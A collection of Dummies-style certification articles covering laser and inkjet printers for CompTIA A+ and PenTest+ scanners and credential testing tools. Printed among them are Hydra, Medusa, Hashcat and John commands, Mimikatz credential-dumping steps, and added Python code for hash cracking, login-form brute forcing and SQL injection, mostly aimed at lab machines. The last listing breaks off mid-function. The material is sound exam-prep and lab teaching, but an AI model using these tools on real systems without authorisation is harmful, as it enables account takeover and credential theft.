Glen Clarke

Articles From Glen Clarke

CompTIA PenTest+ Certification For Dummies Cheat Sheet

Cheat Sheet / Updated 03-08-2022

Welcome to the CompTIA PenTest+ Certification For Dummies online cheat sheet! Here, you'll find quick facts to remember on test day to help you answer questions found on the CompTIA PenTest+ certification exam. It includes some of the major concepts you need to know for the exam such as the phases of the penetration testing process, OSINT tools, exploitation tools, wireless cracking tools, Nmap command-line switches, and parts of the penetration test report.

Types of Printers—What You Need to Know for the CompTIA A+ Exams

Article / Updated 08-26-2021

The different types of printers in today's busy world of computing are laser, inkjet, dot matrix, thermal, and virtual. You need to be familiar with each type for the CompTIA A+ certification exams.

Laser printers

The laser printer, also known as a page printer because it prints one page at a time, is the most popular type of printer because it is fast and reliable, and offers the best-quality printout of the printer types discussed here. A laser printer gets its name because it uses a laser beam in the printing process. A laser printer, shown in the following figure, is also the most expensive type of printer because of its high-cost components such as the laser. Many parts work together to make the laser printer and its printing process run smoothly:

Paper feeder mechanism: Laser printers use a set of pickup rollers to grab the paper from the paper tray and feed it into the printer.

Paper transport path: Rollers are used throughout the print process so that the paper can continue to move through the printer. Registration rollers move the paper. Fuser rollers, also known as the fuser assembly, melt the toner onto the paper. Exit rollers guide the paper out of the printer.

Toner cartridge: The toner cartridge (shown in the following figure) contains the replaceable components of the printing process. It contains three core components. The toner is electrically charged material made of pigment (to give it its color) and plastic (so it can be melted to the page) that is attracted to the paper to create the printout. The print drum, also known as the imaging drum, holds an electrostatic charge that the laser alters wherever it strikes the drum; that charge pattern then attracts the toner. The cleaning blade cleans excess toner off the drum after the print process has completed.

Power supply: The power supply in the printer converts AC from the wall outlet into the DC voltages that charge the primary corona wire and the transfer corona wire, and that power the other components of the printer.

Primary corona wire: The primary corona wire applies the initial -600V charge to the drum.

Transfer corona wire: The transfer corona wire gives the paper a positive electrical charge that is used to attract the toner to the paper.

Each component of the laser printer plays a part in the print operation. The process used to perform that operation is the laser printing process.

The laser printing process

The laser printing process has six phases, and you are required to know them for the A+ exams. Knowing the process is the basis for effective printer support and is essential for passing the A+ exams. The six phases of the laser printing process are conditioning, writing, developing, transferring, fusing, and cleaning. As you read the following sections, identify where each step occurs in the schematic shown.

1. Charging the drum (Conditioning)

This phase is often known as the conditioning or charging phase. When the printer receives a command from the computer's operating system to begin the print process, the primary corona wire applies a -600V charge to the photosensitive drum, also known as the print drum. This charge is one reason why a printer requires a high-voltage power supply.

2. Exposing the drum (Writing)

This phase is often referred to as the exposing or writing phase. After the drum has the -600V charge, a laser beam is used to hit areas on the drum to create the image to be printed. In the areas on the drum that the laser touches, the charge changes from -600V to approximately -100V. Recognize that the areas exposed to the laser beam are more positively charged than the rest of the drum.

3. Developing the image (Developing)

After the image is created on the photosensitive drum, toner is used to develop the image on the drum. Alongside the print drum is the developing roller. The developing roller has a -600V charge, which attracts the toner from the toner reservoir to the developing roller. Because the print drum and the developing roller are both charged to -600V (except for the areas of the print drum previously exposed to laser light), the toner from the developing roller is attracted only to the -100V areas of the print drum. This is the "opposites attract" principle at work: although both the drum and the roller are negatively charged, -100V is more positive than -600V, so the toner on the -600V roller is attracted to the -100V areas on the drum. Now that the print drum has toner only on the areas of -100V charge, the image is ready for transfer to paper.

4. Transferring the image (Transferring)

After the toner is on the print drum, the feed rollers (also known as the registration rollers) feed the paper into the printer and over the transfer corona wire. The transfer corona wire, also known as the secondary corona wire, applies a very strong positive charge of +600V to the paper. Such a strong charge ensures that the toner will be attracted from the -100V areas of the drum to the paper, again because opposites attract. The paper continues to move through the assembly and passes over the drum, pulling the toner from the drum onto the paper.

5. Fusing the image (Fusing)

After the paper moves past the print drum and holds the toner, the paper moves through the fusing rollers, which melt the toner onto the paper. The fusing rollers are needed because the only thing holding the toner to the paper at this point is an electrostatic charge. During the fusing phase, the paper moves between a heated, Teflon-coated roller and a rubber pressure roller, which melt the toner in place. The paper is then ejected from the printer.

6. Cleaning up the mess (Cleaning)

After the printing has completed, any excess toner that remains on the print drum needs to be cleaned off. That is the purpose of this last phase, the cleaning phase. A cleaning blade scrapes any leftover toner off the print drum and into a holding tray to prepare the drum for the next print operation.

The A+ certification exams focus on laser printers when it comes to asking questions about printers. Be familiar with dot matrix and inkjet printers, but most of all, be sure that you are comfortable with laser printers and the laser printing process.

Lab 4-1 will help you identify parts of the laser printer. You will need a laser printer available to perform this lab. Lab 4-1 can be found on the companion website at www.dummies.com/go/aplusaio.

Inkjet printers

Inkjet printers (see the following figure) offer the next highest level of print quality and are relatively cheap compared to laser printers. Inkjet printers are great for home use or small office environments that don't have large print jobs. Inkjet printers don't use toner like a laser printer; instead, they use ink cartridges. The ink cartridge contains all the working elements needed to get an image from the computer onto a sheet of paper. It contains compartments of ink, each sealed with a metal plate to prevent ink leakage. Each compartment has a tiny pinhole from which the ink is sprayed from the cartridge onto the paper. What's interesting about ink cartridges is that each has its own integrated print head. The printer's paper roller, feeder assembly, carriage, and belt are similar to these parts on other printer types. Nowadays duplexing (the ability for the printer to produce two-sided output) is pretty standard on most mid-level inkjet print devices.

When the printer receives the command from the computer to print an image, the printer starts the print process by applying an electrical charge to the heating elements in the ink reservoir. The charge heats the heating elements, which cause a small amount of ink to vaporize. The vapor bubble creates pressure that forces a tiny droplet of ink out of the pinhole and onto the paper.

Color inkjet printers are very popular today because of the increased popularity of digital cameras. Color inkjet printers can require two cartridges: one for black ink and one for the colors (cyan, yellow, and magenta). Most inkjet printers today have cartridges that bundle the black ink with the other colors. These cartridges are called CMYK (C for cyan, M for magenta, Y for yellow, and K for black). Some printer manufacturers offer individual cartridges for each color. The benefit of these printers is that if you run out of one color, you need to buy only the cartridge that contains that color, not all the colors.

One thing to keep in mind is that the print cartridges and print heads fall out of alignment on a regular basis. Therefore, you should make a habit of recalibrating the print output for any inkjet printers that you maintain. You should find that calibration utilities are built into the print device's management software.

When it is time to replace a spent ink cartridge, take the old cartridge with you to the store so that you know which cartridge type to buy. Some office supply stores can recycle your old cartridges, sometimes even offering a discount when you turn in your old cartridges. If you do not want to take the old cartridge with you to the store, make sure you know the make and model of the printer that you are buying the cartridge for.

Multifunction printers

Multifunction printers are laser or inkjet printers that incorporate other functions besides printing into a single hardware device. Typically, multifunction printers include scan and fax functionality, and are often WiFi-enabled both for infrastructure and ad-hoc wireless networks. And any multifunction printer worth its salt, like the HP OfficeJet Pro 6830 that I use in my office, supports advanced printing features like duplex (two-sided) printing and collation.

Many business-class multifunction laser or inkjet printers include an internal hard disk drive that the device uses to cache incoming print jobs. This hard drive caching allows the printer to service more print jobs per unit of time than it could by using its much more limited internal RAM. Keep in mind that cached jobs can remain on that disk long after they were printed, so a printer of this class should have its drive wiped (or removed) before it is serviced, resold, or disposed of.

Dot matrix printers

Dot matrix printers are considered impact printers because they physically strike an inked ribbon with a metal pin to put characters on paper. A dot matrix printer fires off rows of pins that strike the ribbon in patterns to create the image or characters that need to be printed. Each pin is driven by a solenoid: the pin sits inside a coil of wire and is held in place by a spring and a small magnet. When a pin is needed to help create the image by striking the ribbon, an electrical charge is sent through the coil that surrounds the pin. The field created by the current cancels the hold of the magnet, releasing the pin so that it fires against the ribbon. The solenoids are contained in the print head, which moves across the paper printing one line of dots at a time.

Originally, dot matrix printers used only nine pins in the print head. The 9-pin dot matrix printers were known as draft-quality printers and were later replaced by 18- and even 24-pin dot matrix printers. The quality of the 24-pin dot matrix was much better than that of the 9-pin because the greater number of dots creates a finer image.

Thermal printers

For the A+ exams, you simply need to focus on laser, dot matrix, and inkjet printers. Another type of printer you might encounter, though, is a thermal printer, which creates printouts on special paper by heating a stylus located on the print head. The heated stylus causes a chemical reaction on the special paper, which is sensitive to heat.

Virtual and cloud-based printers

A virtual printer is a non-physical print device that exists on your local system. What do I mean, you ask? Well, I'm here to tell you that every time you use the Portable Document Format (PDF) printer with Adobe Acrobat, or the Microsoft XML Paper Specification (XPS) printer that is included with the Office productivity suite, you're in fact using a virtual printer. A virtual printer exists entirely in software, and its sole purpose is to "print" output to a document or image file. Printing to a file or image is a great benefit to individuals and businesses who covet the so-called "paperless office." By using virtual printers you not only contribute to the environment by consuming less paper, but you also save money on otherwise expensive consumables like inkjet and toner cartridges.

By contrast, a cloud printer is a virtual printer whose device drivers are managed, well, in the cloud. Apple AirPrint and Google Cloud Print are two printing technologies whose goal is to make it easier for you and others to print output from any print device without having to go through the trouble of installing a device driver. (AirPrint actually discovers printers on the local network rather than through an internet service, and Google discontinued Cloud Print at the end of 2020.) Here's how driverless printing works: You connect your AirPrint- or Cloud Print-enabled printer to your WiFi network. Next, you choose the Print function from any application running on another host on the same WiFi network. The printer should be available, and your print job will go through despite your not having manually loaded device drivers and/or configuration utilities. Pretty neat!

For those of you who are concerned about security (and that should be all of you): Authentication on your WiFi network (WPA2 or WPA3) keeps outsiders off the network, but any device that is on the network can usually discover and submit jobs to a driverless printer, so the printer's own access controls, administrator password, and firmware updates still matter. That said, the data privacy aspect is enough to scare many individuals and businesses away from any technology that mentions "cloud" in its name.

3D printers

A 3D printer allows you to make three-dimensional solid objects from a digital blueprint file. The creation of the objects takes place by the printer laying down layer after layer of plastic filament until you have the completed object. 3D printers have a number of practical applications beyond the "maker" joy: product prototyping, scale models, proof of concept, and so forth.

Common parts on the printer

Whether you are using a laser printer, inkjet printer, or dot matrix printer, some parts are common to each of the printer types, although how they physically print is different. The following are some common elements to each printer type:

Print head: The print head is responsible for the printing. With inkjets, the print head contains the nozzles that shoot out the ink, while a dot matrix print head contains the pins that strike the ribbon.

Heating element: The "thermal" in "thermal printer" denotes the necessity of a heating element. The element heats the stylus that the print head applies to your paper. Incidentally, thermal printers require special thermal paper, so stock up!

Feeder: The feed assembly is responsible for picking up the paper from the paper tray and feeding the paper into the printer.

Roller: Many printers have rollers to move the paper through the printer.

Duplexing assembly: The duplexing assembly is responsible for allowing automatic printing on both sides of the page. The duplex assembly can be added to many printers to obtain automatic duplexing capabilities.

Carriage and belt: The carriage-and-belt system is the part of the printer that moves the print head back and forth across the page.

Paper tray: The paper tray holds the paper while it is waiting to be picked up and sent through the printer.

Common Pentest Tools: Credential Testing Tools

Article / Updated 03-23-2021

The second category of pentesting tools that appears in the CompTIA PenTest+ objectives is credential testing tools. Credential testing tools help you crack passwords for user accounts on a system. There are a number of password cracking tools out there, but these are the tools the PenTest+ exam wants you to be familiar with.

Hashcat

Hashcat is a common password-cracking tool used to crack password hashes offline, that is, from a hash dump you already have rather than by logging in to a live service. Hashcat can crack hashes from a number of different hashing algorithms, including MD5, SHA1, and many more, and can use dictionary attacks, mask (brute-force) attacks, and combinations of the two. For example, you could use the following command:

hashcat -m 0 -a 0 -o output.txt target_hashes.txt /usr/share/wordlists/rockyou.txt

Where:

-m 0 specifies the hash mode. 0 means MD5, while 100 is SHA1.
-a 0 specifies the attack mode. 0 means a dictionary (wordlist) attack; 3 is a mask attack such as ?d?d?d?d for four digits.
-o specifies the output file to write the cracked passwords to. In this example, I used output.txt.
target_hashes.txt is the file that contains the hashes to be cracked, one per line.
/usr/share/wordlists/rockyou.txt is the dictionary list file that comes with Kali Linux (it ships compressed as rockyou.txt.gz and must be unzipped first).

You can view the many parameters of Hashcat and their possible values by typing hashcat -h in a Linux terminal.

Medusa and Hydra

Medusa and Hydra are online password-cracking tools included with Kali Linux: instead of working on hashes, they send real login attempts to a running service, which means they are noisy, show up in the target's logs, and can trigger account lockout policies. Medusa is a fast password-cracking tool that can encapsulate the password attack into different protocols, such as HTTP, FTP, IMAP, MSSQL, POP3, SMTP, TELNET, SSH, and many more. For Medusa on Kali Linux, use the following command:

medusa -h 192.168.1.3 -u admin -P rockyou.txt -M ssh

This command will try to crack the password for a user known as admin on system 192.168.1.3 using SSH as the protocol and the password list file of rockyou.txt.

Hydra is a password-cracking tool that can encapsulate the attack inside many protocols as well, such as FTP, HTTP, HTTPS, LDAP, MS-SQL, MySQL, RDP, POP3, SMB, SSH, and many more. Notice that you can use it to crack passwords over RDP. So you could use Nmap to discover all systems on the network running RDP and then use Hydra to attempt to crack the administrator password. For example, use this command to detect systems with RDP on the network:

nmap -sS 192.168.1.0/24 -p 3389

Once you have discovered the systems running RDP, you can then try to crack the passwords with the following command (assuming 192.168.1.3 is one of the systems):

hydra -l administrator -P rockyou.txt rdp://192.168.1.3

Where:

-l is the name of the user account to crack. Note that you can use -L instead with a text file containing a list of users.
-P specifies the password list file to use. In this example I used rockyou.txt.
rdp://192.168.1.3 is the system we want to crack the password on. Note that the URL starts with the protocol. If you want to crack the password over FTP or HTTP, you would simply start the URL with those protocols.

Hydra can be used to crack passwords using many different internet protocols; for example, you can use Hydra to brute force a website login using HTTP or HTTPS. In the following example, I demonstrate how to use Hydra to crack the login page of the DVWA site that is running on the Metasploitable2 VM:

1. Ensure the Kali Linux and Metasploitable2 VMs are running, run ifconfig on each, and record the IP address:
Kali Linux: __________________
Metasploitable2: _____________

2. On Kali Linux, launch a browser and type http://<ip_metasploitable2>.

3. Choose the DVWA link.

4. Right-click on the page and choose Inspect Element. You should now have the web page and the HTML source code shown on the screen.

5. In the bottom half of the screen, choose the Network tab to monitor network traffic as you try to log on to the site.

6. In the main logon screen, type your name in the Username and Password textboxes and then choose the Login button. You will notice that your login fails (on the web page under the Login button), but you will also see on the Network tab that the page was posted to login.php.

7. Select the login.php POST method line (see the following figure). On the right you can see the details of the request (Header, Cookies, Params).

8. Choose the Edit and Resend button in order to recreate the HTTP POST request message and gather the information that Hydra needs to perform the password attack. Hydra needs the hostname or IP address, the login page URL, the request body, and the error message. Record the information:
Host/IP: ______________________________________________
Login page (Referer without host/IP): ______________________
Request body: _________________________________________
Error message: _________________________________________

In my example, I recorded the following information:
Host/IP: 192.168.67.137
Login page (Referer without host/IP): /dvwa/login.php
Request body: username=glen&password=glen&Login=Login
Error message: Login failed (error shown on page)

9. Next, replace the actual username and password with the placeholders ^USER^ and ^PASS^ as shown below:
Host/IP: 192.168.67.137
Login page (Referer without host/IP): /dvwa/login.php
Request body: username=^USER^&password=^PASS^&Login=Login
Error message: Login failed (error shown on page)

Note that ^USER^ and ^PASS^ are placeholders: for every username and password read from the user list file and password list file, Hydra substitutes those words into the request body, so a large number of username and password combinations can be tried from the one command.

10. Now that we have all of the information, start a terminal session in Kali Linux.

11. Enter the following Hydra command to attempt to crack the login page of the site:

hydra -L userlist.txt -P passlist.txt <host_IP> http-post-form "<login_page>:<request_body>:<error_message>"

Note that:
-L refers to a text file containing a list of users.
-P specifies the password list file to use.
<host_IP> refers to the IP or hostname of the website.
http-post-form is the Hydra module used to perform the password attack.
<login_page> refers to the URL of the login web page.
<request_body> refers to the username and password parameters.
<error_message> is the error message that was displayed on the page when the login failed. Hydra treats any response that contains this string as a failed attempt and any response that lacks it as a successful login, so the string must match the page's text exactly (DVWA shows "Login failed"); a mistyped string turns every guess into a false positive.

In my example, this is the command I executed to perform the password attack on the DVWA site:

hydra -L userlist.txt -P passlist.txt 192.168.67.137 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"

If a username and password are found, you will see them displayed on the screen, as shown. If you would like to see the actual usernames and passwords that are attempted displayed on the screen while the attack is occurring, you can add -V to the end of the command like this:

hydra -L userlist.txt -P passlist.txt 192.168.67.137 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed" -V

For the PenTest+ certification exam, remember that Hashcat, Medusa, and Hydra are all examples of password-cracking tools available on Kali Linux.

CeWL

CeWL, short for Custom Word List generator, is a unique credential-cracking tool in the sense that it does not crack anything itself: it generates a text file containing potential passwords by crawling through a site and collecting the words found there, on the theory that people pick passwords related to their organization. You could use the following command to generate a wordlist file:

cewl -d 2 -m 5 -w words.txt http://www.yourcustomer.com

Where:
-d 2 specifies the depth in the site to go. Here we are going two links deep.
-m 5 specifies the minimum length in characters of the words picked up.
-w specifies the file to write the list of potential passwords to.

John the Ripper

John the Ripper is a multiplatform password-cracking tool that runs on platforms such as Windows and Linux, and can crack passwords stored in different hash forms such as MD5 and SHA. The John package that comes with Kali Linux includes a number of tools such as:

mailer: The mailer script is used to email users whose passwords have been cracked.
john: The john command is the John the Ripper password-cracking tool itself.
unafs: The unafs command extracts password hashes from an AFS (Kerberos) database into a form that john can crack. (The package also includes unshadow, which merges /etc/passwd and /etc/shadow into a single file for john.)

If you have the hashes in a file, you can attempt to crack them with the following command:

john --format=raw-md5 target_hashes.txt

Where:
--format specifies the type of hash values being cracked (unsalted MD5 in my example).
target_hashes.txt specifies the text file containing the list of hashes.

In this figure you can see that I ran John the Ripper against a file called target_hashes.txt and it was able to crack two of the passwords: Password and HELLO. Run without a wordlist, john works through its default modes (single-crack, then its built-in wordlist, then incremental brute force). You can also supply your own wordlist to perform a dictionary attack on the hash list:

john --format=raw-md5 --wordlist=rockyou.txt target_hashes.txt

Cracked passwords are saved in john's pot file, so you can list them again later with john --show --format=raw-md5 target_hashes.txt.

Cain and Abel

Cain and Abel is an older, Windows-only password-cracking tool that has a number of features. It can capture traffic on the network and then discover passwords that are sent in clear text. It can also be used to crack many different types of passwords, such as MD5 hashes, Cisco hashes, Windows passwords, and password-protected files.

Mimikatz

Mimikatz is a post-exploitation tool available in Kali Linux that is used to steal credentials from a Windows system after the system has been exploited. The tool works by reading the credential material that the Local Security Authority Subsystem Service (LSASS) keeps in memory for logged-on users, and the results aid in gaining access to other systems on the network. Prior to Windows 8.1, the WDigest authentication package kept a reversibly encrypted copy of each logged-on user's password in LSASS memory together with the key needed to decrypt it; Mimikatz leverages this to recover the plaintext. Microsoft added a registry value to turn that behaviour off (HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential), backported it to Windows 7 and Windows 8 in update KB2871997, and made it disabled by default on Windows 8.1, Windows Server 2012 R2, and later, including Windows 10. However, after compromising a system with administrative access, an attacker can set UseLogonCredential back to 1 and wait for users to log on again, which is why that registry value is worth monitoring.

To use Mimikatz after you have exploited a system, you can use the commands shown here:

mimikatz # privilege::debug
Privilege '20' OK

Note that the first command requests the SeDebugPrivilege (privilege number 20) that Mimikatz needs in order to read LSASS memory; you must be running as an administrator for this to succeed. If you receive a return status of Privilege '20' OK, the privilege was granted. Next, use the sekurlsa module of Mimikatz, which retrieves the credentials from memory:

mimikatz # sekurlsa::logonpasswords

As output you will receive a list of the logon sessions found in memory with the username, domain name, the LM hash, the NTLM hash, and the SHA1 hash of the password, and, where WDigest is enabled, the password in plain text. Even when no plaintext is present, the NTLM hash can be reused directly in pass-the-hash attacks. On systems with LSA Protection (RunAsPPL) or Credential Guard enabled, this module fails or returns nothing useful.

For the PenTest+ certification exam, know that John the Ripper and Cain and Abel are password-cracking tools. Also know that Mimikatz is a post-exploitation tool that can be used to steal passwords after gaining administrative access to the system.

Patator and DirBuster

Two additional tools to be familiar with are Patator and DirBuster. Patator is a multi-purpose brute-forcer in the same family as Hydra and Medusa: its modules guess logins against services such as FTP, SSH, SMTP, HTTP forms, and databases (it also has modules for password-protected zip files and Java keystores), but it is not a hash cracker. DirBuster is an Open Web Application Security Project (OWASP) tool that brute-forces directory and file names on a web server from a wordlist; it finds hidden content rather than credentials, but the CompTIA objectives list it alongside the credential testing tools.
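The following Python script is an added example (not code from the article or from the hashcat or John the Ripper projects) that implements what the hashcat -a 0 and john --wordlist commands above actually do: hash each candidate from a wordlist and compare it with the target hashes, plus the mask attack that hashcat -a 3 performs. The wordlist, the "stolen" hashes, and the salts are constructed inline; the hash-mode numbers 0 (MD5) and 100 (SHA1) are hashcat's. It also contrasts unsalted hashes, where every candidate is hashed once regardless of how many targets there are, with per-user salted hashes, where the work multiplies by the number of targets.

```python
import hashlib
import itertools
from typing import Dict, Iterable, List, Tuple

# hashcat's -m values for the two unsalted algorithms named in the article
HASH_MODES = {0: "md5", 100: "sha1"}

# Subset of hashcat's built-in mask charsets (used by -a 3)
MASK_CHARSETS = {
    "?d": "0123456789",
    "?l": "abcdefghijklmnopqrstuvwxyz",
    "?u": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
}


def digest(mode: int, data: bytes) -> str:
    return hashlib.new(HASH_MODES[mode], data).hexdigest()


def mask_candidates(mask: str) -> Iterable[str]:
    """Expand a hashcat-style mask such as '?u?l?l?d' into every candidate string."""
    charsets = []
    i = 0
    while i < len(mask):
        token = mask[i:i + 2]
        if token in MASK_CHARSETS:
            charsets.append(MASK_CHARSETS[token])
            i += 2
        else:                                   # literal character in the mask
            charsets.append(mask[i])
            i += 1
    for combo in itertools.product(*charsets):
        yield "".join(combo)


def crack_unsalted(mode: int, targets: List[str],
                   candidates: Iterable[str]) -> Tuple[Dict[str, str], int]:
    """Dictionary or mask attack on unsalted hashes.

    Returns ({hash: plaintext}, number of hash computations). Each candidate is
    hashed once and looked up in a set, so the cost does not grow with the number
    of target hashes; that is why hashcat and john load the whole hash file at once
    and why an unsalted dump falls so quickly."""
    pending = {h.lower() for h in targets}
    cracked: Dict[str, str] = {}
    ops = 0
    for cand in candidates:
        if not pending:
            break
        ops += 1
        h = digest(mode, cand.encode())
        if h in pending:
            pending.discard(h)
            cracked[h] = cand
    return cracked, ops


def crack_salted(mode: int, targets: List[Tuple[str, str]],
                 candidates: List[str]) -> Tuple[Dict[str, str], int]:
    """Same attack against (salt, hash) pairs. Every target has its own salt, so
    each candidate must be re-hashed per target: cost = candidates x targets."""
    cracked: Dict[str, str] = {}
    ops = 0
    for salt, h in targets:
        for cand in candidates:
            ops += 1
            if digest(mode, (salt + cand).encode()) == h.lower():
                cracked[h] = cand
                break
    return cracked, ops


# --- Constructed sample data: a tiny wordlist and the hashes of three "stolen"
# --- passwords, two weak ones and one that no wordlist contains.
WORDLIST = ["123456", "password", "letmein", "Password", "HELLO", "qwerty", "dragon"]
SECRETS = ["Password", "HELLO", "T9#vq!Lz2"]
MD5_TARGETS = [hashlib.md5(s.encode()).hexdigest() for s in SECRETS]
SALTED_TARGETS = [(f"salt{i}", hashlib.md5((f"salt{i}" + s).encode()).hexdigest())
                  for i, s in enumerate(SECRETS)]


def demo() -> Dict[str, object]:
    dict_hits, dict_ops = crack_unsalted(0, MD5_TARGETS, WORDLIST)        # hashcat -m 0 -a 0
    salted_hits, salted_ops = crack_salted(0, SALTED_TARGETS, WORDLIST)
    pin_hash = hashlib.sha1(b"7341").hexdigest()                          # a 4-digit PIN
    mask_hits, mask_ops = crack_unsalted(100, [pin_hash],
                                         mask_candidates("?d?d?d?d"))     # hashcat -m 100 -a 3 ?d?d?d?d
    return {
        "dictionary": sorted(dict_hits.values()), "dictionary_ops": dict_ops,
        "salted": sorted(salted_hits.values()), "salted_ops": salted_ops,
        "mask": list(mask_hits.values()), "mask_ops": mask_ops,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

With the seven-word list, the unsalted run recovers Password and HELLO in 7 hash computations while the salted run needs 16 for the same result, and the strong password survives both; the mask attack finds the PIN after 7342 SHA1 computations, which is why short all-digit secrets are not worth protecting with a fast hash.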
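The DVWA procedure above leaves the mechanics of http-post-form to Hydra. The following Python script is an added example (not code from the article or from the Hydra project) that performs the same attack itself: it takes the "page:body:failure-string" specification, substitutes ^USER^ and ^PASS^, sends each form, and applies Hydra's rule that a response without the failure string is a valid login. The userlist, passlist, and the fake DVWA login page are constructed so that the example runs offline; the real login.php answers a successful login with a redirect rather than a welcome page, which the stand-in simplifies. URL-encoding the substituted values is this script's choice, not something the article describes.

```python
import urllib.parse
import urllib.request
from typing import Callable, Dict, List, Tuple

# A poster takes (path, url-encoded body) and returns the response body as text.
Poster = Callable[[str, str], str]


def urllib_poster(host: str, scheme: str = "http") -> Poster:
    """Poster that really submits the form to scheme://host/path (needs network)."""
    def post(path: str, body: str) -> str:
        req = urllib.request.Request(
            f"{scheme}://{host}{path}", data=body.encode(), method="POST",
            headers={"Content-Type": "application/x-www-form-urlencoded"})
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode(errors="replace")
    return post


def parse_form_spec(spec: str) -> Tuple[str, str, str]:
    """Split Hydra's 'page:body:failure-string' argument for http-post-form."""
    path, body, failure = spec.split(":", 2)
    return path, body, failure


def brute_force(post: Poster, spec: str, users: List[str], passwords: List[str],
                verbose: bool = False) -> Tuple[List[Tuple[str, str]], int]:
    """Try every user/password pair. A response that does NOT contain the
    failure string counts as a successful login (Hydra's rule).
    Returns (valid pairs, number of requests sent)."""
    path, template, failure = parse_form_spec(spec)
    found: List[Tuple[str, str]] = []
    attempts = 0
    for user in users:
        for password in passwords:
            body = (template.replace("^USER^", urllib.parse.quote_plus(user))
                            .replace("^PASS^", urllib.parse.quote_plus(password)))
            attempts += 1
            page = post(path, body)
            if verbose:                              # like hydra -V
                print(f"[ATTEMPT] {user}:{password}")
            if failure not in page:
                found.append((user, password))
                break                                # this user is done; next user
    return found, attempts


# --- Constructed stand-in for DVWA's login.php so the example runs offline.
def fake_dvwa(valid_accounts: Dict[str, str]) -> Poster:
    def post(path: str, body: str) -> str:
        if path != "/dvwa/login.php":
            return "404 Not Found"
        fields = dict(urllib.parse.parse_qsl(body))
        if valid_accounts.get(fields.get("username", "")) == fields.get("password"):
            return "<html><title>DVWA :: Welcome</title><p>Hello</p></html>"
        return "<html><p>Login failed</p></html>"
    return post


SPEC = "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"
USERS = ["admin", "glen"]                            # constructed userlist.txt
PASSWORDS = ["123456", "password", "Secr3t&"]        # constructed passlist.txt
TARGET = fake_dvwa({"admin": "password", "glen": "Secr3t&"})


def demo() -> Dict[str, object]:
    hits, sent = brute_force(TARGET, SPEC, USERS, PASSWORDS)
    # The same attack with the failure string in the wrong case: no response
    # contains "Login Failed", so the very first guess for each user is
    # reported as valid. This is the false-positive flood described above.
    bad_spec = SPEC.replace("Login failed", "Login Failed")
    false_hits, _ = brute_force(TARGET, bad_spec, USERS, PASSWORDS)
    return {"hits": hits, "requests": sent, "false_positives": false_hits}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Against a live target you would replace TARGET with urllib_poster("192.168.67.137") and read USERS and PASSWORDS from the two list files; the request count returned by brute_force is a useful reminder of how loud this attack is in the web server's access log.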

Common Pentest Tools: Scanners

Article / Updated 03-23-2021

The first category of tools that appears in the CompTIA PenTest+ objectives is scanners. A number of different types of scanners exist: some scanners will scan for open ports, while other scanners are designed to find vulnerabilities within a system.

Nmap

Nmap is a common network scanner used by pentesters to locate systems on the network and determine the ports that are open on those systems. You can also use Nmap to identify the software running on the ports (service/version detection, -sV) and the type of operating system being used (OS detection, -O). You need to know the Nmap syntax for the PenTest+ certification exam!

Nikto and w3af

Nikto is an open-source web application vulnerability scanner. When you run it against a website or web application, Nikto performs a number of tests to determine if the web application is vulnerable to different types of attacks. To perform a Nikto scan against a system, you would use the following command:

nikto -h <IP_or_FQDN>

For example, to perform a web vulnerability scan on the system with the internet protocol (IP) address 192.168.1.3, you could use the command nikto -h 192.168.1.3, as shown. If the web application is using SSL/TLS, you could use the following command to scan an HTTPS site:

nikto -h 192.168.1.3 -ssl

Another example of an open-source web application vulnerability scanner is w3af, which is described as a web application attack and audit framework for assessing the security of your web servers. You can download w3af, or use the copy preinstalled on Kali Linux, where you can access it from Applications | Web Application Analysis. With w3af you select the different types of vulnerabilities to check for by enabling the appropriate plugins and then starting the scan. Note that the CompTIA objectives list w3af under the credential testing tools, but I have placed it in the "Scanners" section as that is what the tool is best known for.

Nessus

Nessus is a commercial tool used for vulnerability scanning of systems on the network. Not only will Nessus scan for a wide range of vulnerabilities, but it will also scan a number of different types of devices for those vulnerabilities. Nessus also offers a free edition (Nessus Essentials) that is limited to scanning 16 IP addresses, which is a perfect learning tool!

OpenVAS

OpenVAS is an open-source vulnerability scanner. OpenVAS can perform the vulnerability scan in a number of different ways, including authenticated (credentialed) and unauthenticated testing.

SQLmap

SQLmap is a program you can download to help automate SQL injection attacks against a web application you are authorized to test in your penetration test. SQLmap comes preinstalled on Kali Linux. If you want to perform an automated test with SQLmap, you need to pass in the URL to be tested, including its query string:

sqlmap -u "http://192.168.1.3/product.php?id=5"

The quotes keep the shell from interpreting characters such as ? and &. The URL shows that the page accepts a parameter (id) as input, and SQLmap will send a series of malicious values in the id parameter to find out whether they are interpreted as SQL by the database behind the page.

For the PenTest+ certification exam, remember that Nikto is a web application vulnerability scanner; SQLmap is an automated SQL injection attack tool; and Nessus is a system vulnerability scanner used to identify weaknesses in a product.
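To make concrete what SQLmap is probing for when it is pointed at product.php?id=5, here is an added Python example (not code from the article or from the sqlmap project) with a constructed SQLite database standing in for the shop behind that page. It shows the vulnerable query that pastes the id parameter into the SQL text, the hardened form that validates and binds it, two of the payload styles sqlmap sends (a tautology and a UNION that pulls rows out of another table), and the boolean-based "AND 1=1 / AND 1=2" comparison sqlmap uses to decide that a parameter is injectable. The table and column names are assumptions.

```python
import sqlite3
from typing import Callable, List, Tuple

Row = Tuple[int, str, float]


def make_db() -> sqlite3.Connection:
    """Constructed sample schema standing in for the database behind product.php."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO product VALUES (?, ?, ?)",
                     [(5, "Widget", 9.99), (6, "Gadget", 19.99), (7, "Gizmo", 4.50)])
    conn.execute("INSERT INTO users VALUES (?, ?, ?)",
                 (1, "admin", "5f4dcc3b5aa765d61d8327deb882cf99"))   # md5("password")
    return conn


def product_vulnerable(conn: sqlite3.Connection, product_id: str) -> List[Row]:
    """The bug behind product.php?id=5: the request parameter is concatenated
    into the SQL text, so whatever it contains is executed as SQL."""
    sql = f"SELECT id, name, price FROM product WHERE id = {product_id}"
    return conn.execute(sql).fetchall()


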